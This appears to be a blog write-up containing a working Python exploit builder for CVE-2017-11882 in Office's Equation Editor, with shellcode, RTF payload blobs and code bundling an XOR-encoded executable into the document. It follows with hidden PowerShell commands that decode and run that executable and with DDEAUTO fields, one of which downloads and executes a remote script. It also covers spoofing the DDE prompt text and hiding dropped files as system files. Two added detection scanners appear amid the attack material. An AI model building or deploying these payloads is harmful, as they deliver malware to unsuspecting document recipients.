FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF52006F006F007400200045006E00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500FFFFFFFFFFFFFFFF0200000002CE020000000000C00000000000004600000000000000000000000070F7DECF0064D30103000000C00300000000000001004F006C00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000A000201FFFFFFFFFFFFFFFFFFFFFFFF000000000000000000000000000000000000000000000000000000000000000000000000000000001400000000000000010043006F006D0070004F0062006A00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000FFFFFFFF00000000000000000000000000000000000000000000000000000000000000000000000001000000660000000000000003004F0062006A0049006E0066006F0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000012000201FFFFFFFF04000000FFFFFFFF000000000000000000000000000000000000000000000000000000000000000000000000030000000600000000000000FEFFFFFF02000000FEFFFFFFFEFFFFFF05000000060000000700000008000000090000000A0000000B0000000C0000000D0000000E000000FEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF010000020800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100FEFF030A0000FFFFFFFF02CE020000000000C000000000000046170000004D6963726F736F6674204571756174696F6E20332E30000C0000004453204571756174696F6E000B0000004571756174696F6E2E3300F439B271000000000000000000000000000000000000000000000000000000000000000000000000000000000300010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
'''

stuff605 = '4500710075006100740069006F006E0020004E00610074006900760065000000000000000000000000000000000000000000000000000000000000000000000020000200FFFFFFFFFFFFFFFFFFFFFFFF00000000000000000000000000000000000000000000000000000000000000000000000004000000B5020000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'

tail605 = r'''
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000105000000000000}{\result{\pict{\*\picprop}\wmetafile8\picw380\pich260\picwgoal380\pichgoal260
0100090000039e00000002001c0000000000050000000902000000000500000002010100000005
0000000102ffffff00050000002e0118000000050000000b0200000000050000000c02a0016002
1200000026060f001a00ffffffff000010000000c0ffffffc6ffffff20020000660100000b0000
0026060f000c004d61746854797065000020001c000000fb0280fe000000000000900100000000
0402001054696d6573204e657720526f6d616e00feffffff5f2d0a6500000a0000000000040000
002d01000009000000320a6001100003000000313131000a00000026060f000a00ffffffff0100
000000001c000000fb021000070000000000bc02000000000102022253797374656d000048008a
0100000a000600000048008a01ffffffff6ce21800040000002d01010004000000f00100000300
00000000
}}}
\par}
'''
# 0: b8 44 eb 71 12 mov eax,0x1271eb44
# 5: ba 78 56 34 12 mov edx,0x12345678
# a: 31 d0 xor eax,edx
# c: 8b 08 mov ecx,DWORD PTR [eax]
# e: 8b 09 mov ecx,DWORD PTR [ecx]
# 10: 8b 09 mov ecx,DWORD PTR [ecx]
# 12: 66 83 c1 3c add cx,0x3c
# 16: 31 db xor ebx,ebx
# 18: 53 push ebx
# 19: 51 push ecx
# 1a: be 64 3e 72 12 mov esi,0x12723e64
# 1f: 31 d6 xor esi,edx
# 21: ff 16 call DWORD PTR [esi] // call WinExec
# 23: 53 push ebx
# 24: 66 83 ee 4c sub si,0x4c
# 28: ff 10 call DWORD PTR [eax] // call ExitProcess
stagecmd = "\xB8\x44\xEB\x71\x12\xBA\x78\x56\x34\x12\x31\xD0\x8B\x08\x8B\x09\x8B\x09\x66\x83\xC1\x3C\x31\xDB\x53\x51\xBE\x64\x3E\x72\x12\x31\xD6\xFF\x16\x53\x66\x83\xEE\x4C\xFF\x10"

# pads with nop
stagecmd = stagecmd.ljust(44, '\x90')

# 0: b8 44 eb 71 12 mov eax,0x1271eb44
# 5: ba 78 56 34 12 mov edx,0x12345678
# a: 31 d0 xor eax,edx
# c: 8b 08 mov ecx,DWORD PTR [eax]
# e: 8b 09 mov ecx,DWORD PTR [ecx]
# 10: 8b 09 mov ecx,DWORD PTR [ecx]
# 12: 66 83 c1 3c add cx,0x3c
# 16: ff e1 jmp ecx
stagesc = "\xB8\x44\xEB\x71\x12\xBA\x78\x56\x34\x12\x31\xD0\x8B\x08\x8B\x09\x8B\x09\x66\x83\xC1\x3C\xFF\xE1"

# pads with nop
stagesc = stagesc.ljust(44, '\x90')

# This is shellcode to inject into another EQNEDT32.EXE and execute it
# source at shellcode.c
stageinject = 'U\x8b\xec\x83\xe4\xf8\x81\xec\xc4\x03\x00\x00\xb9U\x95\xdbmSVW\xe8\xc8\x02\x00\x00\x8b\xf8\x85\xffu\x18\xb9u\xee@p\xe8\xb8\x02\x00\x00\x8b\xf8\x85\xffu\x083\xc0@\xe9\xa3\x02\x00\x00\xba\x9e3i\xb7\x8b\xcf\xe8\xfb\x02\x00\x00\x8b\xf0\x85\xf6t\xe6\xba*\x92\x12\xd8\xe8\xeb\x02\x00\x003\xdb\x89D$ \x85\xc0u\x03S\xff\xd6\xba\xc8\xe8"o\x8b\xcf\xe8\xd2\x02\x00\x00\x89D$8\x85\xc0u\x03S\xff\xd6\xba\xc2\xcf\xa2\xeb\x8b\xcf\xe8\xbb\x02\x00\x00\x89D$D\x85\xc0u\x03S\xff\xd6\xba\xaa?z\xbe\x8b\xcf\xe8\xa4\x02\x00\x00\x89D$4\x85\xc0u\x03S\xff\xd6\xba\xf3\xf4\xf8\x97\x8b\xcf\xe8\x8d\x02\x00\x00\x89D$$\x85\xc0u\x03S\xff\xd6\xbaN\x96 ~\x8b\xcf\xe8v\x02\x00\x00\x89D$0\x85\xc0u\x03S\xff\xd6\xba\x19.\xb5\xae\x8b\xcf\xe8_\x02\x00\x00\x8b\xd8\x85\xdbu\x03P\xff\xd6\xbaZj\x0c\xbb\x8b\xcf\xe8J\x02\x00\x00\x89D$@\x85\xc0u\x03P\xff\xd6\xba\x8d\xbfw\x82\x8b\xcf\xe83\x02\x00\x00\x89D$<\x85\xc0u\x03P\xff\xd6jDY\x8dD$X3\xd2\x88\x10@Iu\xfaj\x10Y\x8dD$H\x88\x10@Iu\xfa3\xc0\xc7D$XD\x00\x00\x00f\x89\x84$\x88\x00\x00\x00\x8dD$HP\x8dD$\\\xc7\x84$\x88\x00\x00\x00\x01\x00\x00\x00PRRj\x02RRR\x8dD$0\xc7D$0EQNEPR\xc7D$<DT32\xc7D$@.EXE\x88T$D\xff\xd3\x85\xc0u\x04j\xff\xff\xd6j`Y\x8d\x84$\xa0\x00\x00\x00\xc6\x00\x00@Iu\xf9\x83\xbc$\xa0\x00\x00\x00\x03tA\x8b|$4\x8b\\$$h\x88\x13\x00\x00\x8d\x84$\xa4\x00\x00\x00P\xff\xd7\x85\xc0u\x03P\xff\xd6\x83\xbc$\xa0\x00\x00\x00\x03t\x19h\x02\x00\x01\x00\xfft$X\xfft$X\xff\xd3\x83\xbc$\xa0\x00\x00\x00\x03u\xc7\x8b\x9c$\xb0\x00\x00\x00\x8d\x84$\x00\x01\x00\x00\x8b\xbc$\xb4\x00\x00\x00\xb9\xcc\x02\x00\x00\xc6\x00\x00@Iu\xf9\x8d\x84$\x00\x01\x00\x00\xc7\x84$\x00\x01\x00\x00\x01\x00\x01\x00PW\xffT$L\x85\xc0u\x03P\xff\xd6\x8dD$,Pj@h\x00P\x00\x00h\x00\x10@\x00S\xffT$4\x85\xc0u\x03P\xff\xd6\x83d$,\x00\xe8k\x01\x00\x00\x83d$(\x00\x8dH\x01\x89L$ \x8bD$ \x8b\x00\x89D$(\x8dD$,\x83\xc1\x04P\xfft$,Qh\x00\x10@\x00S\xffT$L3\xdb\x85\xc0u\x03S\xff\xd6\x8d\x84$\x00\x01\x00\x00\xc7\x84$\xb8\x01\x00\x00\x00\x10@\x00PW\xffT$8\x85\xc0u\x03S\xff\xd6S\xffT$D\x85\xc0u\x03S\xff\xd6h\x02\x00\x01\x00\xfft$X\xfft$X\xffT$0\x85\xc0u\x03S\xff\xd6\xfft$P\xffT$@\x85\xc0u\x03S\xff\xd6S\xff\xd6_^[\x8b\xe5]\xc3U\x8b\xecQSVW\x8b\xd9d\xa10\x00\x00\x00\x8b@\x0c\x8bp\x0c\x8bV0\x8b\xc2\x89E\xfc\x85\xd2t%\x0f\xb7\x02\xb9\x05\x15\x00\x003\xff\xeb\rk\xc9!\x0f\xb7\xc0\x03\xc8G\x0f\xb7\x04zf\x85\xc0u\xee;\xcbt\x15\x8bE\xfc\x8b6\x8bV0;\xd0u\xce3\xc0_^[\x8b\xe5]\xc3\x8bF\x18\xeb\xf4U\x8b\xec\x83\xec\x10\x8bA<\x89U\xfc\x8bD\x08x\x85\xc0tV\x8bT\x08\x1cS\x8b\\\x08$\x03\xd1V\x8bt\x08 \x03\xd9\x8bD\x08\x18\x03\xf1\x89U\xf03\xd2\x89u\xf4\x89E\xf8W\x85\xc0t)\x8b4\x96\xbf\x05\x15\x00\x00\x03\xf1\xeb\tk\xff!\x0f\xbe\xc0\x03\xf8F\x8a\x06\x84\xc0u\xf1;}\xfct\x12\x8bu\xf4B;U\xf8r\xd73\xc0_^[\x8b\xe5]\xc3\x0f\xb7\x04S\x8bU\xf0\x8b\x04\x82\x03\xc1\xeb\xeb\xeb\x04\x8b\x04$\xc3\xe8\xf7\xff\xff\xff\xc3'


def genrtf605(type, cmd):
    print "use genrtf605"

    payload = '\x1c\x00\x00\x00\x02\x00\xa8\xc3\x99\x02\x00\x00\x00\x00\x00\x00H\x90]\x00l\x9c[\x00\x00\x00\x00\x00\x03\x01\x01\x03\n\n\x01\x08ZZ'
    if type:
        payload += stagecmd
    else:
        payload += stagesc

    payload += pack('<I', 0x00402114)  # ret
    payload += '\x00' * 2

    left = 0x100 - len(payload)

    # custom cmd command (hard-coded here, overriding the -c argument)
    cmd = """cmd /k "cd c:\\users\\a\desktop & echo 111 > 1.txt" """

    payload += cmd[:left]
    payload = payload.ljust(0x100, '\x00')

    return head605 + payload.encode('hex') + stuff605 + cmd[left:].ljust(437, '\x00').encode('hex') + tail605


def genrtf17k(type, cmd):
    print "use genrtf17k"

    payload = '\x1c\x00\x00\x00\x02\x00\xa8\xc3kF\x00\x00\x00\x00\x00\x00\xa0_s\x00d\x0cq\x00\x00\x00\x00\x00\x03\x01\x01\x03\n\n\x01\x08ZZ'
    if type:
        payload += stagecmd
    else:
        payload += stagesc

    payload += pack('<I', 0x00402114)  # ret
    payload += '\x00' * 2

    # cmd = """cmd /c powershell -WindowStyle hidden -Command "$rtfpath = Get-ChildItem *.doc | where-object {$_.length -eq 0x00037831} | Select-Object -ExpandProperty Name; $file = gc $rtfpath -Encoding Byte; for($i=0; $i -lt $file.count; $i++) { $file[$i] = $file[$i] -bxor 0x77 }; $path = '%temp%\\tmp' + (Get-Random) + '.exe';sc $path ([byte[]]($file | select -Skip 008241)) -Encoding Byte; &$path;" """
    payload += cmd

    payload = payload.ljust(18055, '\x00')

    return head17k.lower() + payload.encode('hex') + tail17k.lower()


def genrtf(type, cmd):
    if len(cmd) > 17967:
        if type:
            raise ValueError('Command must be shorter than 17967 bytes!')
        else:
            raise ValueError('Code must be shorter than 17967 bytes!')

    if len(cmd) > 605:
        return genrtf17k(type, cmd)
    else:
        return genrtf605(type, cmd)


if __name__ == '__main__':

    parser = argparse.ArgumentParser(prog='CVE-2017-11882.py',
                                     description="Exploit for CVE-2017-11882 @unamer(https://github.com/unamer/CVE-2017-11882)")
    parser.add_argument("-c", "--cmd",
                        help="Command or shellcode file to run in target system\n(Must be shorter than 17967 bytes!!)",
                        required=True)
    parser.add_argument("-t", "--type", help="Type (0:shellcode 1:command, default=1)", default=1, type=int,
                        choices=[0, 1],
                        required=False)
    parser.add_argument("-i", "--inject", help="Inject shellcode to new process", default=None, required=False)

    parser.add_argument('-o', "--output", help="Output exploit rtf", required=True)

    args = parser.parse_args()

    data = ''

    if args.type:
        data = args.cmd
    else:
        try:
            f = open(args.cmd, 'rb')
            data = f.read()
            f.close()

            if args.inject is not None:
                data = stageinject + pack('<I', len(data)) + data
        except:
            raise ValueError('Error in reading shellcode file!')

    # XOR value used to encode the appended file
    bXorEncryptValue = 0x77
    # open the file to be bundled; change the name as needed
    with open('./PEiD.exe', 'rb') as bind:
        dat = bind.read()
        bind.close()
    dat = bytearray(dat)
    for i in range(len(dat)):
        dat[i] = dat[i] ^ bXorEncryptValue
    dat = bytes(dat)

    with open(args.output, 'wb') as f:
        f.write(genrtf(args.type, data))
        f.write(dat)
        f.close()

    print 'Done.'

Here the file name is hard-coded directly. That runs, but what I want to achieve is finding the file without knowing its path or file name.

The corresponding change goes at line 107 of the PoC code (605-byte version) or line 127 (17k version).

cmd = """cmd /c powershell -WindowStyle hidden -Command "$rtfpath='c:\users\dell\desktop\11882.doc'; $file = gc $rtfpath -Encoding Byte; for($i=0; $i -lt $file.count; $i++) { $file[$i] = $file[$i] -bxor 0x77 }; $path = '%temp%\\tmp' + (Get-Random) + '.exe';sc $path ([byte[]]($file | select -Skip 008241)) -Encoding Byte; &$path;" """

Borrowing the lnk-bundles-exe approach of locating the file by its size: failed.

cmd = """cmd /c powershell -WindowStyle hidden -Command "$rtfpath = Get-ChildItem *.doc | where-object {$_.length -eq 0x00037831} | Select-Object -ExpandProperty Name; $file = gc $rtfpath -Encoding Byte; for($i=0; $i -lt $file.count; $i++) { $file[$i] = $file[$i] -bxor 0x77 }; $path = '%temp%\\tmp' + (Get-Random) + '.exe';sc $path ([byte[]]($file | select -Skip 008241)) -Encoding Byte; &$path;" """

Checking the current directory revealed the problem: the execution path is not the directory the file lives in but the default path C:\Windows\System32

python2 CVE-2017-11882.py -c 'cmd /c "cd > C:\\Users\DELL\Desktop\1.txt"' -o demo.doc

Walking the directory tree

Getting the full file path with PowerShell

cmd /c "cd .. & cd .. & powershell -WindowStyle hidden -Command "$rtfpath = Get-ChildItem -filter *.doc -recurse | where-object {$_.length -eq 0x00037831} | %{$_.FullName};$file = gc $rtfpath -Encoding Byte;for($i=0; $i -lt $file.count; $i++) { $file[$i] = $file[$i] -bxor 0x77 };$path = '%temp%\\tmp' + (Get-Random) + '.exe';sc $path ([byte[]]($file | select -Skip 008241)) -Encoding Byte; &$path;""

Problem: the walk takes a long time, and when it reaches protected folders the program terminates; stability is poor
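As an added example (not the post's code or the PoC's), here is a scanner for the bundling layout described in this section: it finds the end of the RTF body by brace matching, checks for the Equation.3 object marker (plain or hex-encoded in \objdata), and recovers the single-byte XOR key of an executable appended after the closing brace, assuming the blob begins with a DOS "MZ" header and validating the PE signature. The sample bytes are constructed inline.

```python
# Added example (not the post's or the PoC's code): scan an RTF for the bundling
# layout described above: an Equation.3 object plus a single-byte-XOR-encoded
# executable appended after the closing brace. Sample bytes are constructed.
import struct

def rtf_body_end(data):
    """Offset just past the brace closing the outermost RTF group, or -1."""
    if not data.startswith(b"{\\rtf"):
        return -1
    depth, i = 0, 0
    while i < len(data):
        c = data[i]
        if c == 0x5C:          # backslash escapes the next byte (\{ \} \\)
            i += 2
            continue
        depth += (c == 0x7B) - (c == 0x7D)
        if c == 0x7D and depth == 0:
            return i + 1
        i += 1
    return -1

def find_xored_pe(blob):
    """Return the XOR key if blob decodes to an MZ image with a valid PE signature."""
    if len(blob) < 0x40:
        return None
    key = blob[0] ^ ord("M")
    if blob[1] ^ key != ord("Z"):
        return None
    e_lfanew = struct.unpack_from("<I", bytes(b ^ key for b in blob[:0x40]), 0x3C)[0]
    sig = bytes(b ^ key for b in blob[e_lfanew:e_lfanew + 4])
    return key if sig == b"PE\0\0" else None

def scan_document(data):
    """Report an Equation.3 object (plain or hex-encoded inside \\objdata) and any
    XOR-encoded PE after the RTF body together with the offset a carver must skip."""
    hexed = b"Equation.3".hex().encode()
    report = {"equation_object": b"Equation.3" in data or hexed in data.lower(),
              "pe_offset": None, "xor_key": None}
    end = rtf_body_end(data)
    if end == -1:
        return report
    # the blob may sit directly after '}' or after the trailing newline
    for off in (end, len(data) - len(data[end:].lstrip(b"\r\n"))):
        key = find_xored_pe(data[off:])
        if key is not None:
            report.update(pe_offset=off, xor_key=key)
            break
    return report
```

The reported pe_offset is the same number the post's `select -Skip` expression has to carry, so a mismatch between the two is itself a useful triage signal.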

office DDE

References:

Office DDE: multiple exploitation techniques

Office DDE vulnerability study notes

Originally I considered using a macro to drop the doc into a chosen directory and hide it, so that the bundled file could be dropped and executed from any location through a hard-coded file path, but I found that the RTF format does not allow macros. So I decided to use DDE to inject a command (a cmd opened this way defaults to the directory containing the document) that copies the bundled file to a chosen directory, and to plant it in the RTF part of the PoC code

Basic usage

# Inside the document: press Ctrl + F9 and type the following inside the braces that appear
DDEAUTO c:\\windows\\system32\\cmd.exe "/k copy 11882.doc C:\\Users\\DELL\\AppData\\Local\\Temp"

Changing the pop-up

The command I referenced looks like this

DDEAUTO "C:\Programs\Microsoft\Office\MSWord\..\..\..\..\windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoP -sta -NonI -W Hidden IEX (New-Object System.Net.WebClient).DownloadString('http://willgenovese.com/hax/evil.ps1'); # " "Microsoft Document Security Add-On"

But it had many problems in use, so I studied the matching rules a bit and wrote my own:

  • Put the constructed cd command first; the cd command can be changed freely, but the number of characters must stay the same
  • For instance, in the example below, #…Office totals 28 characters; if you want to show something other than Office, use fewer # for a name longer than Office and more # for a shorter one
  • That is not explained very clearly; try it a few times and you will see what I mean. Subsequent commands are chained with &

DDEAUTO C:\\Program_Files(x86)\\Microsoft_Office\\Office12\\Library\\..\\..\\..\\..\\windows\\system32\\cmd.exe "/c cd C:\\######################\\Office & copy 11882.doc C:\\Users\\Dell" "Microsoft Document Security Add On"

Planting the DDE directly into the binary RTF format has not been implemented yet
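An added example (not the post's own code) that parses DDE field instructions of the form shown above and reports the traits a defender would alert on: path traversal in the application path, a command interpreter as the application, shell arguments in the topic, and the # padding used to shape the prompt text. It also pulls instructions out of RTF \fldinst groups, which goes beyond the post since the field had not yet been placed into RTF. The field grammar assumed is DDEAUTO <application> <topic> [<display text>], with \\ standing for one backslash.

```python
# Added example (not the post's own code): parse Word DDE field instructions
# like the one above and flag the traits a defender would alert on. Assumed
# grammar: DDEAUTO <application> <topic> [<display text>], "\\" = one
# backslash; the RTF \fldinst extraction is a generalization of the post.
import re

TOKEN = re.compile(r'"([^"]*)"|(\S+)')            # quoted string or bare word
FLDINST = re.compile(rb"\\fldinst\s*\{?\s*([^{}]+?)\s*\}")

def parse_dde_field(instr):
    """Split a field instruction into verb, application, topic and display text."""
    tokens = [q or u for q, u in TOKEN.findall(instr.strip())]
    if not tokens or tokens[0].upper() not in ("DDE", "DDEAUTO"):
        return None
    parts = [t.replace("\\\\", "\\") for t in tokens[1:]] + [""] * 3
    return {"verb": tokens[0].upper(), "application": parts[0],
            "topic": parts[1], "display": parts[2]}

def assess(field):
    """Return the reasons a parsed DDE field looks like command execution."""
    reasons = []
    app = field["application"].lower()
    if "\\..\\" in app:
        reasons.append("path traversal in application path")
    if any(s in app for s in ("cmd.exe", "powershell")):
        reasons.append("application is a command interpreter")
    if any(s in field["topic"].lower() for s in ("/c", "/k", "copy ", "&")):
        reasons.append("topic carries shell arguments")
    if re.search(r"#{4,}", field["application"] + field["topic"]):
        reasons.append("padding characters used to shape the prompt text")
    return reasons

def extract_rtf_fields(data):
    """Field instructions from RTF \\fldinst groups, where Word keeps DDE fields."""
    return [m.group(1).decode("latin-1") for m in FLDINST.finditer(data)]
```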

Hiding the file

Drop the bundled file into a chosen directory and hide it. Even with "show hidden files" enabled, a file hidden this way cannot be seen unless "show protected operating system files" is also enabled (Folder -> ... -> Options -> View -> Hide protected operating system files), and that pops up a warning that sounds fairly serious, enough to scare an ordinary user

# hide
attrib filename(quotes optional) +s +h
# restore
attrib filename(quotes optional) -s -h

# parameters:
# attrib: modify file attributes
# +s: mark the file as a system file
# +h: mark the file as hidden